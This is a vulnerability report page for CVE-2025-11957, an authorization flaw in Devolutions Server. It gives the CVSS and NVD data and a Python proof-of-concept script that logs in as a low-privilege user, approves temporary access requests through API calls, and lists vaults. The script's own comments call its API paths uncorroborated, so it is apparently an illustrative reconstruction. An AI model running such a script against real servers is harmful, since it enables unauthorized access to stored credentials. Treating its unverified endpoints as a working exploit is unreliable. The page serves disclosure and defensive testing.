Security Vulnerability Report
CVE-2025-11957 CVSS 8.4 HIGH

CVE-2025-11957

Published: 2025-10-22 17:15:56
Last Modified: 2025-11-25 18:15:49

Description

Improper authorization in the temporary access workflow of Devolutions Server 2025.2.12.0 and earlier allows an authenticated basic user to self-approve or approve the temporary access requests of other users and gain unauthorized access to vaults and entries via crafted API requests.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:* - VULNERABLE
Devolutions Server <= 2025.2.12.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-11957 PoC - Devolutions Server Improper Authorization (CWE-639).

Reproduces the report's description: an authenticated basic user approves a
temporary access request (its own or another user's) and then reads vaults.
Affected range as stated on this page: Devolutions Server 2025.2.12.0 and
earlier (description); the CPE match data lists versionEndExcluding
2025.2.14.0, so the vendor fix is expected at or before that build.

Flow: authenticate() -> exploit_improper_authorization() ->
access_unauthorized_resources(), driven by main().

NOTE(review): none of the API paths used below (/api/security/login,
/api/temporary-access/requests, /api/temporary-access/approve, /api/vaults)
are corroborated elsewhere on this page; treat them as illustrative until
checked against the vendor advisory (DEVO-2025-0015).

Detection hint for defenders: review temporary-access approval records where
the approver equals the requester, or where the approver role lacks approval
rights, on builds older than the fixed version.

Use only for authorized security testing.
"""
import requests
import json  # unused in this script
import sys

# Configuration -- placeholder values; every one of them must be replaced
# before the script does anything meaningful.
TARGET_URL = "https://target-devolutions-server.local"
ATTACKER_USERNAME = "low_privilege_user"
ATTACKER_PASSWORD = "password123"
TARGET_USER_ID = "victim_user_id"


def authenticate():
    """Log in as the low-privilege user and return the authenticated session.

    Returns:
        requests.Session on HTTP 200, otherwise None (the status is printed).
    """
    session = requests.Session()
    login_url = f"{TARGET_URL}/api/security/login"
    credentials = {
        "username": ATTACKER_USERNAME,
        "password": ATTACKER_PASSWORD
    }
    # verify=False disables TLS certificate validation: credentials are sent
    # to whatever answers at TARGET_URL, so only use on an isolated lab host.
    response = session.post(login_url, json=credentials, verify=False)
    if response.status_code == 200:
        print(f"[+] Successfully authenticated as {ATTACKER_USERNAME}")
        return session
    else:
        print(f"[-] Authentication failed: {response.status_code}")
        return None


def exploit_improper_authorization(session):
    """Approve a temporary access request from a session that should not be allowed to.

    Args:
        session: authenticated requests.Session from authenticate().

    Returns:
        True if the approve call answered 200 or 201 (treated as "vulnerable"),
        False on any other status, including a failed request listing.
    """
    # Step 1: Create or identify a temporary access request
    print("[*] Step 1: Identifying temporary access requests...")
    list_requests_url = f"{TARGET_URL}/api/temporary-access/requests"
    # NOTE(review): unlike the other calls this GET omits verify=False, so it
    # will raise on a self-signed certificate before the status check runs.
    response = session.get(list_requests_url)
    if response.status_code != 200:
        print(f"[-] Failed to list requests: {response.status_code}")
        return False
    # Assumes the body is a JSON list of objects carrying an 'id' key --
    # not confirmed anywhere on this page.
    requests_data = response.json()
    # Step 2: Exploit improper authorization to approve own or others' requests
    print("[*] Step 2: Exploiting improper authorization...")
    approve_url = f"{TARGET_URL}/api/temporary-access/approve"
    # Craft malicious API request to approve access
    exploit_payload = {
        # Falls back to a literal placeholder id when the listing is empty;
        # that request will not exist server-side.
        "requestId": requests_data[0]['id'] if requests_data else "target_request_id",
        "userId": TARGET_USER_ID,
        # Attacker can approve requests without proper authorization
        "approvedBy": ATTACKER_USERNAME,
        "notes": "Approved via crafted API request"
    }
    response = session.post(approve_url, json=exploit_payload, verify=False)
    # Only the HTTP status is inspected; a 200 with a rejecting body would
    # still be reported as success.
    if response.status_code in [200, 201]:
        print("[+] Successfully approved temporary access request (VULNERABLE!)")
        return True
    else:
        print(f"[-] Exploitation failed: {response.status_code}")
        return False


def access_unauthorized_resources(session):
    """List vaults visible to the session after the approval step.

    Args:
        session: authenticated requests.Session.

    Returns:
        True on HTTP 200 (vault names and ids are printed), False otherwise.
    """
    print("[*] Step 3: Accessing unauthorized vaults and entries...")
    vaults_url = f"{TARGET_URL}/api/vaults"
    response = session.get(vaults_url, verify=False)
    if response.status_code == 200:
        # Assumes a JSON list of objects with 'name' and 'id' keys.
        vaults = response.json()
        print(f"[+] Found {len(vaults)} vaults (including previously unauthorized ones)")
        for vault in vaults:
            print(f" - {vault['name']} (ID: {vault['id']})")
        return True
    else:
        print(f"[-] Failed to access vaults: {response.status_code}")
        return False


def main():
    """Run the three steps in order; exits 1 only when authentication fails."""
    print("="*60)
    print("CVE-2025-11957 PoC - Devolutions Server")
    print("Improper Authorization in Temporary Access Workflow")
    print("="*60)
    # Suppress SSL warnings for testing
    requests.packages.urllib3.disable_warnings()
    # Authenticate as low-privilege user
    session = authenticate()
    if not session:
        sys.exit(1)
    # Exploit the vulnerability
    if exploit_improper_authorization(session):
        # Access unauthorized resources
        access_unauthorized_resources(session)
    # Exit status is 0 whether or not the approval succeeded.
    print("\n[*] PoC completed")
    print("[!] This is for authorized security testing only")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11957", "sourceIdentifier": "[email protected]", "published": "2025-10-22T17:15:56.103", "lastModified": "2025-11-25T18:15:49.353", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper authorization in the temporary access workflow of Devolutions Server 2025.2.12.0 and earlier allows an authenticated basic user to self-approve or approve the temporary access requests of other users and gain unauthorized access to vaults and entries via crafted API requests."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:L/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.2.14.0", "matchCriteriaId": "8D3F9B81-CD48-41F8-A9CC-9CCE424DF9D7"}]}]}], "references": [{"url": "https://devolutions.net/security/advisories/DEVO-2025-0015/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}